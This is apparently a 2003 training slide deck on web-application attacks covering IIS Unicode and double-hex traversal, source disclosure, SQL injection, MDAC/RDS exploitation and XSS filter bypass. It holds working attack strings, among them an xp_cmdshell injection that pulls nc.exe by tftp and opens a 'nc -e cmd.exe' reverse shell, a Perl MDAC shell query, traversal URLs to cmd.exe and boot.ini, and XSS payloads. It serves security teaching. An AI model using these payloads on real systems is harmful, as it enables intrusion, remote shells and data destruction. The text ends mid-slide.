Network Security Part II: Attacks

Network Security Part II: Attacks
Web Attacks

Why Target the Web Everyone is using it
Safe bet the protocol will not become obsolete anytime soon New technology is being implemented/ retrofitted on top (e.g. SOAP, WebDAV) It’s everywhere! Mobile phones, cars, watches, toasters… Protocol fundamentally not suited to do a majority of what it’s doing today Simple Object Access Protocol (SOAP) and the Web Distributed Authoring and Versioning (WebDAV) protocol WebDAV is a set of extensions to the HTTP/1.1 protocol that allows clients to perform remote web content authoring operations. This extension provides a coherent set of methods, headers, request entity body formats, and response entity body formats that provide operations for: Properties: The ability to create, remove, and query information about Web pages, such as their authors, creation dates, etc. Also, the ability to link pages of any media type to related pages. Collections: The ability to create sets of documents and to retrieve a hierarchical membership listing (like a directory listing in a file system). Simple Object Access Protocol (SOAP) 1.1 SOAP is a lightweight protocol for exchange of information in a decentralized, distributed environment. It is an XML based protocol that consists of three parts: an envelope that defines a framework for describing what is in a message and how to process it, a set of encoding rules for expressing instances of application-defined datatypes, and a convention for representing remote procedure calls and responses. SOAP can potentially be used in combination with a variety of other protocols; however, the only bindings defined in this document describe how to use SOAP in combination with HTTP and HTTP Extension Framework. SECURITY INNOVATION ©2003

The Trouble with HTTP Multitude of involved technologies
The involved protocols are extremely simple; therefore, it is easy to (mis)code services on your own HTTP server Lack of experience coding public service type, multi-user applications Stateless nature makes transaction based systems tricky SECURITY INNOVATION ©2003

How Did We Get Here? Unskilled/robotic programmers (“code mills”)
Lack of security-oriented programming training Tendency to ‘code now, fix later’ Current tools make it very easy to code insecurely Misconceptions about what ‘security’ really involves SECURITY INNOVATION ©2003

Trouble Prone Areas of the Web
Buffer overflows Classic bug that’s been exploited for quite a while Lack of bounds-checking in the language a majority of web applications are written in combined with poor programming practice Can exist in the web server, application server, database server, or the CGI programs Fortunately it’s a well-advertised problem Many scripting languages (ASP, PHP, Perl, .NET, etc) are generally immune, as they have auto-expanding elements SECURITY INNOVATION ©2003

Cross-site scripting Reprinting user data without filtering it for web-specific characters Potential to trick users into executing java script in vulnerable site’s context Partly a ‘social engineering’ technique More of a liability than a vulnerability—it’s a way to hack the users, not the server SECURITY INNOVATION ©2003

SQL tampering Web server already has/allows access to the database server Attacker can cause arbitrary SQL to be executed Results vary from data exposure to full system compromise Does not require direct database access! Many applications are vulnerable Stems from CGIs/scripts making assumptions about user input and not double checking/filtering SECURITY INNOVATION ©2003

File includes It’s common for a CGI to open and display or manipulate the contents of a file on the server If the filename is composed of user-supplied elements, an attacker may be able to trick the server into opening another file Can lead to info disclosure or script or command execution SECURITY INNOVATION ©2003

Authentication weaknesses CGIs can fail to check credentials with every request Thus you bypass the login script and directly access the following scripts, without needing username/password Or, certain actions/functions may not check for the proper authentication SECURITY INNOVATION ©2003

Weak session mechanism The session/state mechanism uses predictable token IDs Or, the ID keyspace is too small for the number of users Either way, an attacker can ‘guess’ a valid token and hijack the session SECURITY INNOVATION ©2003

Mid Range E-Commerce Roll-Out
Web Server Application Server Database Server … and a Firewall Maybe some options… Load Balancer Reverse Proxy servers Cache systems SECURITY INNOVATION ©2003

Typical Web Application Set-Up
Server DB Web app Client HTTP request (cleartext or SSL) HTTP reply (HTML, Javascript, VBscript, etc) Plugins: Perl C/C++ JSP, etc Database connection: ADO, ODBC, etc. SQL Database Apache IIS Netscape etc… Firewall SECURITY INNOVATION ©2003

Traditional Hacking Targeted against vulnerabilities in OS components and Network services. Buffer overflows Not portable; attacks specific to operating system architecture, authentication, services, etc. Myriad of exploits for different services, OS platforms, CPU architectures, etc. SECURITY INNOVATION ©2003

Traditional Hacking ... winsock_found: xor eax, eax push eax inc eax call socket cmp eax, -1 jnz socket_ok push sockerrl push offset sockerr call write_console jmp quit2 socket_ok: mov sock, eax mov sin.sin_family, 2 mov esi, offset _port Requires specialized coding skills such as writing shell-code for buffer-overflows, etc. In short, it is a complex activity with a limited practitioner base. SECURITY INNOVATION ©2003

Limitations of Traditional Hacking…
Modern network architectures are getting more robust and secure. Firewalls being used in almost all network roll-outs. OS vendors learning from past mistakes (?) and coming out with patches rapidly. Increased maturity in coding practices. SECURITY INNOVATION ©2003

Hacks on OS network services prevented by firewalls
Utility of Firewalls Hacks on OS network services prevented by firewalls SQL Database Firewall Web Server Web app DB Web app DB Web app Web app wu-ftpd X The IPC$ share isn't a "share" in the sense that it is a directory, disk or printer. First off, you can see by the "$" that it's an admin share that is created by default when the system is booted. IPC stands for "interprocess communications", and the IPC$ share provides the capability for logging into the system. Remember that...if the sysadmin for the target server has enabled auditing of successful and failed login attempts, then the IPC$ connection attempt will show up in the EventLog. This is true even if you don't successfully log in...it's recorded as a failed login attempt. Close port 139 NetBIOS. Wu-Ftpd is an ftp server based on the BSD ftpd that is maintained by Washington University. Wu-Ftpd allows for clients to organize files for ftp actions based on "file globbing" patterns. File globbing is also used by various shells. The implementation of file globbing included in Wu-Ftpd contains a heap corruption vulnerability that may allow for an attacker to execute arbitrary code on a server remotely. Close port 21 ftp Multiple Vendor Sun RPC xdr_array Buffer Overflow Vulnerability. The xdr_array procedure is used by client/server applications implementing Sun RPC to filter between local C representations of variable length arrays and their machine-independent external data representations (XDR). A buffer overflow vulnerability has been reported in the xdr_array() procedure. Remote attackers may exploit this vulnerability through RPC services to execute arbitrary code on target hosts. As RPC services typically run with root privileges, successful exploitation may mean complete compromise. OpenBSD originally reported that this vulnerability may be exploited by remote attackers to cause a denial of service. If this is a heap-based overflow, the nature of the OpenBSD malloc implementation may only allow for exploitation to cause a crash. Other platforms that use the same Sun RPC code but a different malloc implementation may allow for code execution. Sun RPC close port 111 Sun RPC X NT ipc$ X Limits Traditional hacking SECURITY INNOVATION ©2003

Outbound access restricted. Why would a web server telnet out?
Utility of Firewalls SQL Database Firewall Web Server Web app DB Web app DB Web app Web app X Outbound access restricted. Why would a web server telnet out? SECURITY INNOVATION ©2003

Futility of Firewalls Web traffic is the most commonly allowed of any of the protocols through enterprise firewalls. HTTP is perceived as friendly traffic Why lay siege to the wall when you have a open door. Attacks that based on Content/Applications applications are still viewed by some as rare. SECURITY INNOVATION ©2003

Tools Required for Web Hacking
A web browser An Internet connection ….a clear mind and some spare time! SECURITY INNOVATION ©2003

A Classification of Web Hacks
Web attacks fall under the following general categories: Buffer overflow attacks SQL injection attacks Input validation attacks URL interpretation attacks Impersonation attacks SECURITY INNOVATION ©2003

Firewalls Cannot Prevent…
Complexity mismanagement Indifference Firewall Web Client Web Server Web server misconfiguration SECURITY INNOVATION ©2003

Attack the Architecture
Java Runtime Web Server html handler jsp text/html header /bin/sh include file shtml Process SSI tags #exec #include script/ execu- -table JSP tags Java Compiler class default cgi sh, perl,… ?? SECURITY INNOVATION ©2003

Web Server Architecture Attacks
Complex web server architectures are can lead to implementation vulnerabilities. A common attack is to bypass the web server configuration directives, and invoke the built-in procedures directly. A close look at the web server architecture can reveal security problems. SECURITY INNOVATION ©2003

Architecture Misconfigurations
Handler Forcing: Certain mis-configurations allow handlers to be forced onto files that are not supposed to be processed by them. Forcing a default handler onto a CGI file can cause the contents of the CGI file to be returned “as-is”. Forcing a JSP handler onto an HTML file can cause the contents of the HTML file to be compiled by the Java compiler and executed by the Java run-time machine SECURITY INNOVATION ©2003

JSP PageCompile handler forced on to html files
JSP Handler Forcing html text/html header Web Server html handler JSP PageCompile handler forced on to html files jsp handler Process JSP tags Java Compiler Java Runtime class SECURITY INNOVATION ©2003

URL Interpretation Attacks
Several well known vulnerabilities in Windows NT and Internet Information Services dating from Autumn 2000, have been wrapped into a common definition: "The Unicode Bug." URL Parsing vulnerability. Improper handling of illegal Unicode sequences. Allows remote users to execute arbitrary commands on the web server under the context of IUSR. Can lead to potential Administrator level access. SECURITY INNOVATION ©2003

The IIS Unicode Bug Exploit: %c0%af = “/”
winnt/system32/cmd.exe?/c+dir+c:\ attacker could view a directory listing of a server's C:\ drive %c0%af = “/” Can use HTTP POST to send multiple commands at a time to cmd.exe. Once an attacker has remote read and execute permissions, still in the context of IUSR_computername, what she needs next if only for defacement, is write access By typing cmd.exe+cmd1.exe the attacker is able to write the file c:\winnt\system32\cmd.exe to c:\Inetpub\scripts\cmd1.exe Now the attacker has write access to an executable directory and has copied an executable file into that directory. This is an important change in the Unicode Bug discovered by NSFocus. By building on first Unicode vulnerability discovered by Rain Forest Puppy, an attacker gains control of the web server by writing Very Bad Things to that executable directory then running them. Several tools are freely available that facilitate remotely ECHOing or TYPEing a command line script on the server. Tools are also available to upload a command line script, Active Server Page, or executable file to the server. By leveraging several similar vulnerabilities, the attacker has exploited the friendly sounding and all encompassing "Unicode Bug" to remotely write or upload an ASP or Script to an executable directory on a webserver. The BackGate kit contains E.ASP, a Visual Basic Script. The above Unicode exploits are achieved in the security context of IUSR_computername. Nevertheless, it is game over for the server when IIS4 defaults to handing certain ASPs to Local System for execution. When retrieved remotely by a web browser, E.ASP runs with the process token of Local System: a Built-in member of the Administrators group. The subsequent installation processes batch files and downloaded attacker applications, also run in the context of Local System. In a default installation of NT4/IIS4, this configuration is by design. SECURITY INNOVATION ©2003

Web Hacking for Collateral Damage
Web hacking can result in three types of collateral damage. Information disclosure (paths etc.) Arbitrary file content and source code leakage Data disclosure (i.e. return all rows) Arbitrary command execution SECURITY INNOVATION ©2003

Source Code Disclosure
"Use the Source, Luke!“ WebLogic / WebSphere “JSP” bug1. Ability to retrieve source code of JSP/JHTML files. Using uppercase “JSP” in the URL causes the server to return unparsed JSP code. 1. Discovered by Shreeraj Shah, Foundstone. Java application server platforms, such as BEA WebLogic and IBM WebSphere, are becoming increasingly popular. They offer platform independence, flexibility, versatility, ease of integration, and a very rich object-oriented platform for developing applications. As a result mistakes in programming and implementation have crept into some Java application servers, causing source code disclosure vulnerabilities and, in some cases, remote command execution vulnerabilities. Programmers sometimes neglect security and take shortcuts, especially when they are pressed by hard deadlines. In some cases developers may be blindly trusting code from Web sites or book examples. This is free stuff and it doubtful that code contributors who offer their code for free actually take the trouble to write the code in a secure manner. Java application servers offer Web application developers three kinds of technologies: Java Server Pages (JSP), Java HTML (JHTML), and Java servlets. JSP and JHTML allow developers to embed Java code within HTML pages. The code gets compiled, executed, and delivered when the page is requested. As an example of a JSP file that displays the current date and time: <% String s = new java.util.Date().toString(); %><br> The date is: <%= s %> If this file is stored as date.jsp and is running on a Java application server at , accessing the URL will cause the file to be compiled and executed on the server. The output will be returned to the Web browser: The date is: Sat Sep 16 15:54:26 PDT 2000 Java servlets, on the other hand, are more analogous to CGI scripts because the servlets are written in Java and execute within the context of the Java Web server itself. This was a accidental discovery by leaving the Caps Lock key on when typing in the URL. The Capital JSP bug was found on two popular Java application server platforms--BEA's WebLogic server and IBM's WebSphere server and is a classic case of a "handler mismatch,“ vulnerability where the Web server was unable to determine the file type of DATE.JSP. SECURITY INNOVATION ©2003

A Classic Case of “Handler Mismatch."
html handler weblogic.httpd.register.file= weblogic.servlet.FileServlet weblogic.httpd.register.*.shtml= weblogic.servlet.ServerSideIncludeServlet weblogic.httpd.register.*.jhtml= weblogic.servlet.jhtmlc.PageCompileServlet weblogic.httpd.register.*.jsp= weblogic.servlet.JSPServlet HTTP Request: index.JSP shtml handler index.JSP = index.jsp jhtml handler index.jsp WebLogic Server The underlying technology is not at fault; the problem is in the implementation of the programs that deliver the technology coupled with the size and complexity of modern systems. The lesson to be learned is that the liability of running a secure site is on the IT managers themselves. IT teams must keep current with the latest in security vulnerabilities and associated patches that affect each component within their systems in order to keep one step ahead of the hacker. jsp handler X Process JSP tags Java Compiler Java Runtime default handler SECURITY INNOVATION ©2003

More Source Disclosure
URL prefixes for source code disclosure1: /servlet/file/ (IBM WebSphere) /file/ (BEA WebLogic) /*.shtml/ (BEA WebLogic) /ConsoleHelp/ (BEA WebLogic) /servlet/com.sun.server.http.servlet.FileServlet/ (Sun JavaWebServer) 1 Advisories located on: These represent another type of vulnerability that returns unparsed files. These involve forcing the requested file to be handled by the default handler, or in the case of Java application servers, the default servlet. Again, BEA's WebLogic and IBM's WebSphere suffered from this vulnerability. The problem is associated with the way in which servlets are registered and mapped to URLs. With WebLogic, the URL prefix /file/ is mapped to the default file servlet in the weblogic.properties file. A snippet from a default weblogic.properties file is given below: # Default servlet registration # # Virtual name of the default servlet if no matching servlet # is found weblogic.httpd.defaultServlet=file weblogic.httpd.register.file=weblogic.servlet.FileServlet If a URL is prefixed with /file/, the FileServlet servlet will be invoked, no matter what. If the server at were running WebLogic, accessing the URL would cause date.jsp to be processed through FileServlet, and not compiled and executed as it should be, returning the contents of date.jsp unparsed. In WebSphere, the URL prefix to invoke the default servlet is /servlet/file. The above example, if running on WebSphere, would require the URL in order to exploit this vulnerability. SECURITY INNOVATION ©2003

…I Thought it was Functionality
IIS “+.htr” bug. View source code of ASP/ASA files. URL interpretation vulnerability. “.htr” causes ISM.DLL to handle the URL. Characters after the “+” sign (space) are ignored. One of the first Web vulnerabilities affecting IIS 5.0 was the .htr handler parsing vulnerability. IIS's Internet Service Manager uses ism.dll to handle .htr files. IIS uses asp.dll to handle ASP files. Using the .htr vulnerability, it is possible to have any file (.asp, .asa, and so forth) be handled by ism.dll instead of asp.dll. Because ism.dll is not designed to parse ASP tags, it sends out the code as is. To invoke the vulnerability, all the remote attacker has to do is suffix the URL string with +.htr. To view the source code contained in default.asp on using this vulnerability, an attacker would use the URL Nothing gets displayed in the browser window, but you only have to select View/Source to see the ASP code. Exploits don't get much simpler than this. Firewalls can't stop it and it even works with Windows 98 and AOL. One file of particular interest on any Web site based on IIS ASP and SQL Server is global.asa. The global.asa file lies in the Web document root and contains configuration parameters for the Web application. Configuration parameters can include predefined variables, stored user names and passwords for database connections, system names, and database server addresses. Getting the global.asa file gives the attacker the master key to the Web fortress. SECURITY INNOVATION ©2003

Doom on You…. User ID: sa Password: n0t4u2c
<SCRIPT LANGUAGE="VBScript" RUNAT="Server"> Sub Application_OnStart Set Db = Server.CreateObject("Commerce.DbServer") Db.ConnectionString = "DSN=trans.db;UID=sa;PWD=n0t4u2c" Db.Application = " Set Application("Db") = Db End Sub Sub Session_OnStart '==Visual InterDev Generated - DataConnection startspan== '--Project Data Connection Session("DataConn_ConnectionString") = "DSN=CertSrv;DBQ=C:\WINNT2\System32\CertLog\certsrv.mdb;DriverId=25; FIL=MS Access;MaxBufferSize=512;PageTimeout=5;" Session("DataConn_ConnectionTimeout") = 15 Session("DataConn_CommandTimeout") = 30 Session("DataConn_RuntimeUserName") = "" Session("DataConn_RuntimePassword") = "" '==Visual InterDev Generated - DataConnection endspan== End Sub </SCRIPT> For example, accessing the URL gets us the contents of the global.asa file on Note the UID and PWD entries in the database connection string. These entries give the attacker a user ID and password to connect to the Commerce DbServer: <SCRIPT LANGUAGE="VBScript" RUNAT="Server"> Sub Application_OnStart Set Db = Server.CreateObject("Commerce.DbServer") Db.ConnectionString = "DSN=trans.db;UID=sa;PWD=n0t4u2c" Db.Application = " User ID: sa Password: n0t4u2c SECURITY INNOVATION ©2003

More Source Disclosure
Some applications access files without appropriate checking. Input validation vulnerability. No checking performed for file type or location. Filenames can be manipulated via parameters passed on the URL or as hidden fields. SECURITY INNOVATION ©2003

NT IIS Showcode ASP Vulnerability
Active Server Page (ASP) script installed by default on Microsoft's Internet Information Server (IIS) 4.0 Gives remote users access to view any file on the same volume as the web server that is readable by the web server. Showcode.asp is a script that allows a web developer to view the code for a number of samples included with Internet Information Server that are not intended to be installed on production servers. It comes under several different guises, including showcode.asp, viewcode.asp, and codebrws.asp. It lets you view the code of a server-side script without executing it and with some manipulation of the URL it lets you view any file on the same drive as the script. With this in place one could easily compromise an entire server and any sensitive information it contains The difference between innocent use of this file and malicious use is how you format the arguments passed to the script. Although there are numerous variations of the vulnerable script this demonstration will use the most common, Showcode.asp. Showcode.asp is included as an example with the Microsoft Data Access Components that are installed in C:\Program Files\Common Files\SYSTEM\MSADC. If one is running a web server, that subdirectory is also mapped as a virtual directory named MSADC off the web root. Showcode.asp takes a single argument indicating the name of the file that is to be viewed. Since this sample code was initially intended to view code samples in the MSADC directory, the developer thoughtfully put a restriction in code that would only allow paths that started with MSADC. Once again a sloppy implementation lead to a big problem. One was restricted to a path starting with MSADC but simple directory traversal allowed one to move up the directory tree and on to any path on the same drive. For example This URL would reveal the contents of the boot.ini file in the root directory. asp?source=/msadc/Samples/../../../../../boot.ini SECURITY INNOVATION ©2003

SQL Database HTTP request (cleartext or SSL) Firewall Web Client Web Server Web app DB Web app DB Web app Web app URL Interpretation attacks Input validation attacks Extend SQL statements SQL Query Poisoning SECURITY INNOVATION ©2003

SQL Query Poisoning Drop Table: Resultant query:
Resultant query: SELECT * FROM PRODUCT WHERE ID=3 DROP TABLE PRODUCT SECURITY INNOVATION ©2003

SQL Query Poisoning Remote Command Execution! Command executed:
ID=3%01EXEC+master..xp_cmdshell+ ‘tftp+-i GET+nc.exe+ %26%26+nc+-e+cmd.exe ’ Command executed: tftp -i GET nc.exe && nc -e cmd.exe SECURITY INNOVATION ©2003

SQL Remote Commando DB 1 IIS 3 2 Web Browser tftp server
ASP tftp server nc.exe Web Browser C:\>_ 1 2 3 listener at port 2001 to receive the connection tftp server to get nc.exe transferred over to the NT IIS box. SELECT * FROM PRODUCT WHERE ID=3 EXEC master..xp_cmdshell tftp -i GET nc.exe && nc -e cmd.exe SECURITY INNOVATION ©2003

Reverse engineering HTTP cookies SQL Database Firewall Web Client Web Server Web app DB Web app DB Web app Web app Session Hijacking/Impersonation The act of taking control of the session after successfully obtaining or generating an authentication token is called Session Hijacking. The user may or may not still have all or partial control of their session, and may be kicked out in the process. Session Hijacking is usually the result of a successful replay or brute force attack in which an attacker is able to successfully access a user's active session without proper user authentication. An attacker is able to take control of an active session simply by pasting a URL into their browser or by loading stolen cookie data into and accessing a particular web site or URL. Once the attacker has successfully obtained access to the legitimate user's session, he can perform all of the same functions such as reading , making online purchases, etc. Potential Exploit An attacker is able to discover an active session to a banking web application by brute forcing through a sequential list of URLs until a non-404 response is returned. The attacker then pastes the discovered URL into his browser, takes control of the session, goes to online bill pay, writes himself a large check, and logs out, then goes to Best Buy to pre-spend his ill gotten gain. Counter Measures When practical, limit successful sessions to specific IP addresses. This usually only works when dealing with an intranet setting where the IP ranges are predictable and finite. Re-authenticate the user before critical actions are performed (i.e. a purchase, money transfer, etc.) If possible, try to limit unique session tokens to each browser instance (e.g. generate the token with a hash of the MAC address of the computer and process id of the browser, etc.) Follow the same general set of countermeasures to prevent Replay and Brute Force attacks. Use x.509 certificates to prevent more traditional types of TCP traffic predictable sequence number hijacking HTTP session hijacking Impersonation URL Interpretation attacks Input validation attacks SQL query poisoning SECURITY INNOVATION ©2003

Web Server DB Web app Client HTTP request (cleartext or SSL) HTTP reply (HTML, Javascript, VBscript, etc) Plugins: Perl C/C++ JSP, etc Database connection: ADO, ODBC, etc. SQL Database Apache IIS Netscape etc… Firewall Application bugs SECURITY INNOVATION ©2003

The MDAC Attack Vulnerability with Microsoft Data Access Components (msadcs.dll). MDAC allows remote users to perform SQL queries without authentication. Only the DSN needs to be known. SQL queries can be crafted to execute arbitrary commands. Data Source Name (DSN) DSN = "DRIVER={Microsoft Access Driver (*.mdb)};dbq =\\*.mdb; “ This will still invoke the Access (Jet) driver, and tell it to directly use \\*.mdb. No UID. No password. The dbq parameter in the connection setup must be specified and needs to be a valid file. This means we need a valid *.mdb file to connect to. One that may exist is btcustmr.mdb which is installed to %systemroot%\help\iis\htm\tutorial\ by default with option pack 4. The pearl exploit script searches for the correct drive and directory where this file resides. SECURITY INNOVATION ©2003

Internet Explorer or VB.exe Custom Business Objects
The MDAC Attack Client Server Internet Explorer or VB.exe RDS Data Control OBDC Provider Space Custom Business Objects RDS Data Factory ASP (ADO) Jet Provider Jet 3.5 OBDC Remote Data Service URL HTML OLE DB IIS msadcs.dll RDS allows end-users to bring one or more disconnected ActiveX Data Object (ADO) recordsets from a remote server to a client computer using the HTTP, HTTPS, or DCOM protocols. In order for RDS to work properly, it must have the following key components installed: On the client, RDS DataControl and RDS DataSpace are installed when you install Microsoft Internet Explorer 4.0 and higher. On the server, RDS DataFactory, Custom Business Objects and ASP web pages are installed as part of the NT 4 Option Pack, or via the MDAC redistribution file MDAC_TYP.EXE or base Windows 2000 Server. Microsoft Jet Database Engine, a required component for database access to data stored in an Access back-end database (.mdb), is installed when you install MDAC. RDS is basically a way to do remote data queries to a server. This is done over the web. Basically your client app communicates via HTTP to the /msadc/msadcs.dll on your server. The msadcs.dll exposes the RDSServer.DataFactory object, or better known as the AdvancedDataFactory. Now AdvancedDataFactory only has four methods, so we're kind of limited on what we can do. We can CreateRecordSet, Query, SubmitChanges, and ConvertToString. Query and SubmitChanges require a valid database to work upon. When you do a 'typical' or better install with Option Pack 4, a particular .mdb is installed (btcustmr.mdb) which is installed to %systemroot%\help\iis\htm\tutorial\. Upon execution, the script will send a raw GET request to /msdac/msadcs.dll via HTTP/1.0 on the victim’s webserver. If it exists the script will proceed to search for the existence of btcustmr.mdb database using a set combination to locate the correct drive and directory. If this is successful, the script will save the true path to a file named rds.save on the local computer and proceed to creating a new DSN via /scripts/tools/newdsn.exe. SECURITY INNOVATION ©2003

The MDAC Attack Exploit: Gain Administrator Privileges on NT!
$query="Select * from Customers where City='|shell(\"$command\")|'"; $dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" . $p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";} Gain Administrator Privileges on NT! The RDS request in perl dsn (data source name) dbq is the file location where $p1 and $p2 represent variables in the pearl exploit script that search for the drive and directory that contains "\\help\\iis\\htm\\tutorial\\btcustmr.mdb $dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" .$p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";} The pipe character or vertical bar is a reserved character for the Jet database engine. It tells the Jet database engine to evaluate the identifier before evaluating the rest of the expression. Therefore, the Jet database engine inserts the value of the identifier in the expression, and then evaluates it. In SQL, strings must be enclosed in single quotes. If a string includes a single quote it must be escaped by doubling it up. The Jet engine extends this by allowing strings to enclose a VBA expression inside vertical bar characters in the string, like this: select 'lil'' string | 6+7 | with number' as foo from table; This will produce a recordset containing one field with the value "lil' string 13 with number" for each row of the input table. The most useful command is "shell", although this in itself cannot do redirections or pipes - cmd.exe can assist with this though. By using the shell function and running cmd.exe, an attacker can run any command on the system. However, since the pipe operator is a rather obscure character and is very poorly documented, most people don't know it's there - apparently even Microsoft programmers. ODBC-Open DataBase Connectivity ADO-Active Data objects Some background on ODBC & DSNs: an application 'connects' to the ODBC service specifying a specific DSN to query to. The DSNs are defined in the ODBC32 applet of the control panel. Each DSN is basically a description of the name of the DSN, the drivers to use (in our case, the MS Jet/Access drivers), and location of the actual database (a .mdb file somewhere in the filesystem). We could also have DSNs that used drivers such as Oracle or MS Sql, and the location would be another server. The whole point is that you only need to know the DSN name—ODBC will take care of where and how the actual database is to be used. SECURITY INNOVATION ©2003

The MDAC Attack in Action
mdac.pl (exploit) IIS 4.0 msadcs dll DB 1 SELECT * FROM Customers WHERE City = “|shell($command) C:\>_ 3 2 nc.exe tftp server tftp server to get nc.exe transferred over to the NT IIS box. listener at port 2001 to receive the connection SECURITY INNOVATION ©2003

The Effectiveness of Web Hacking
By default ports 80 and 443 are usually allowed through firewalls. The open door… A single URL string is able to be processed by many different components. In most cases the only defense is reliance on secure coding. Typically, the nonsecure server instance is on port 80, which is the default port for connections; and the secure server instance is on port 443, which is the default port for connections. The 's' in the identifies it as SSL (Secure Socket Layer), port 443, unless otherwise noted. Since these port numbers are the standard defaults, the port number does not need to be displayed within the URL. Port number: 443 Common name(s): https Common service(s): SSL Encrypted HTTP Service description(s): HTTP with SSL encryption Common server(s): Apache, IIS, Zeus, Roxen Common client(s): MSIE, Netscape, Mozilla Common problem(s): Man in the middle attack (using dsniff for example). Encrypted options: N/A Secure options: N/A Firewalling recommendations: Firewalling HTTPS is rarely possible due to user backlash. However outgoing access to port 443 from servers should be restricted if possible. Attack detection: Attack deteciton is difficult since the protocol is encrypted. You must use an SSL proxy or a host based intrusion detection system if you wish to do attack detection. Related ports: 80 Related URL(s): SECURITY INNOVATION ©2003

Cross Site Scripting, Why You Should Care.
XSS is not an attack on the server, it is an attack on the users of your application So what? Identity theft User masquerading Reputation Risk SECURITY INNOVATION ©2003

Cross Site Scripting (XSS)
Found in 98% of applications 2 main types Transient (URL basedP Sticky – Script placed in a static bit of web content SECURITY INNOVATION ©2003

XSS continued… Transient generally requires user interaction
What can happen? Possibilities are only restricted by the client Cookie theft most common example But I filter “<“ and “>” Jscript entities “&{alert(‘Test')};” SECURITY INNOVATION ©2003

Session Hijacking HTTP is stateless so application designers must build a way to track state Cookies and URL strings are the most common ways to track state Both are easily exploitable SECURITY INNOVATION ©2003

Session Hijacking Continued…
Generally the next thing to occur after XSS Examples of common session tracking issues SECURITY INNOVATION ©2003

Parameter Tampering Programmers will store data anywhere!
URL parameters Cookies – Cookie:p=$1.00 Hidden fields – not really hidden SECURITY INNOVATION ©2003

Unbound File Calls Ye Ole’ ../../
Becomes an issue with the display important information (global.asa) Most application languages will take URL’s as file arguments SECURITY INNOVATION ©2003

Do You Know Where Your Data is?
Building an exclusionary filter is difficult because your data is all over the place SECURITY INNOVATION ©2003

Customer Service Database
Data Flow Example Internet Orders Database Customer Service Database Database Marketing Database SECURITY INNOVATION ©2003

Designing a proper filter
Make all filters default deny Don’t try to exclude “bad stuff” Requires a good idea where your data is going Log all filter violations SECURITY INNOVATION ©2003

Filter Bypassing is a Technique to Evade Detection by Filtering Systems.
Filter Bypassing techniques come in many varieties when applied to the many facets of web application security. The general idea of performing the various techniques described is to successfully bypass security measures designed to prevent certain types/amounts/values of data from being passed into a given system. Many of the described techniques can be highly effective when used properly and even become more powerful when used in combination. SECURITY INNOVATION ©2003

Most filter systems are very simple
Seven forms of ingenuity: URL Encoded Strings Double Hex Encoding Unicode Encoded String Long URLs Case Sensitivity XSS Filter-Bypass Manipulation Null Character Injection SECURITY INNOVATION ©2003

The Hex Advantage By URL hex encoding URL strings, it may be possible
circumvent filter security systems and IDS. Can become: %2F%70%61%73%73%77%64 SECURITY INNOVATION ©2003

Double Hex Encoding In September 2001, the Nimda worm spread throughout the Internet taking advantage of a Microsoft IIS vulnerability. The vulnerability was called an Escaped Character Decoding Vulnerability, which involves double hex encoding of a URL. An attacker or automated script would craft a URL so that it contained special hex-encoded sequences to exploit a vulnerability. When an un-patched, vulnerable Microsoft IIS server received the encoded URL, one round of hex decoding was performed on the path in the URL. IIS then performed a security check on the decoded URL, but afterwards performed a second round of hex decoding. This secondary decoding was the source of another Vulnerability. SECURITY INNOVATION ©2003

IIS Double Hex Round 1 Decoding: scripts/..%255c../winnt becomes: scripts/..%5c../winnt (%25 = “%” Character) Round 2 Decoding: scripts/..\../winnt Directory path traversal is now possible using path obfuscation through Double Hex Encoding. SECURITY INNOVATION ©2003

The Unicode Slash In unicode, “%c0%af”, is the equivilent to a slash (“/”). Therefore the common URL IIS exploit: scripts/..%c0%af../winnt becomes: scripts/../../winnt Once again, directory path traversal is now possible using path obfuscation through Unicode. SECURITY INNOVATION ©2003

Long URL’s Many system put limits on how much data a variable can store or a system can handle. Often times if these limits are exceeded, the data will still be used, but bypass certain security considerations. URL’s such as: Replaced with: SECURITY INNOVATION ©2003

Method Switching Many web applications do not properly perform HTTP Request Method sanity checking. Performing Method Switching can be used to bypass IDS, logging features and CGI security mechanisms. Most web servers do not log "POST" data and thus forensic analysis is harder to perform. The Request Method: GET /cgi-bin/some.cgi can become: POST /cgi-bin/some.cgi SECURITY INNOVATION ©2003

Using your “HEAD” The “HEAD” request method can be used to determine if a particular HTTP resource is accessible without actually downloading the resource data. Scans and web application attacks can be made to be more effective using this technique. SECURITY INNOVATION ©2003

Null Character Injection
Hex encoded null characters can be used to thwart some security mechanisms. This happens because in the “C” programming language, a null character designates the end of a string. So If a CGI appending a “.html” to an input parameter: Will cut off appending “.html”. SECURITY INNOVATION ©2003

Unicode (UTF-8) Encoded
Unicode is a universal way to represent characters. However, unicode can also be used to circumvent security mechanisms by representing information in another fashion. Microsoft IIS has had security issues in the past while supporting unicode. SECURITY INNOVATION ©2003

URL Encoded String The specification for URLs (RFC 1738, Dec. '94) poses a problem in that it limits the use of allowed characters in URLs to only a limited subset of the US-ASCII character set: "...Only alphanumerics [0-9a-zA-Z], the special characters "$_.+!*'()," [not including the quotes - ed], and reserved characters used for their reserved purposes may be used unencoded within a URL." SECURITY INNOVATION ©2003

XSS Filter-Bypass Manipulation
This technique is used pass various types of client-side scripting language through implemented security filters. The idea is to be able to achieve client-side execution of a client-side script. There are several techniques used to perform this attack. SECURITY INNOVATION ©2003

Hammer the Filters Submit all the raw HTML tags you can find, and then view the output results. Combine HTML with tag attributes, such as SRC, STYLE, HREF and OnXXX (JavaScript Event Handler). This will show what HTML is allowed, what the changes were, and possible dangerous HTML that can be exploited. SECURITY INNOVATION ©2003

Alternate Protocol SRCing
Same technique as the previous, however, using the protocol “livescript” and “mocha” will yield the same effect. <IMG SRC=“livescript:js_expression"> <IMG SRC=“mocha:alert('test');"> SECURITY INNOVATION ©2003

Decimal HTML Entities Variation on previous techniques, using decimal HTML entities between the protocol characters can be used to bypass filters, yet still execute JavaScript. <IMG SRC=“java script:js_expression"> \09 \10 \11 \12 \13 have all been seen to work SECURITY INNOVATION ©2003

Hex HTML Entities Another variation on the previous example, HEX HTML entities may also be used to bypass filter restriction, yet execute JavaScript. <IMG SRC=“java script:js_expression"> SECURITY INNOVATION ©2003

STYLE JavaScript X-Type
Variation on the previous example, but by using the “application/x-javascript” MIME-TYPE, the filters may be bypassed. <STYLE TYPE="application/x-javascript"> alert('JavaScript has been Executed'); </STYLE> SECURITY INNOVATION ©2003

STYLE JavaScript Import
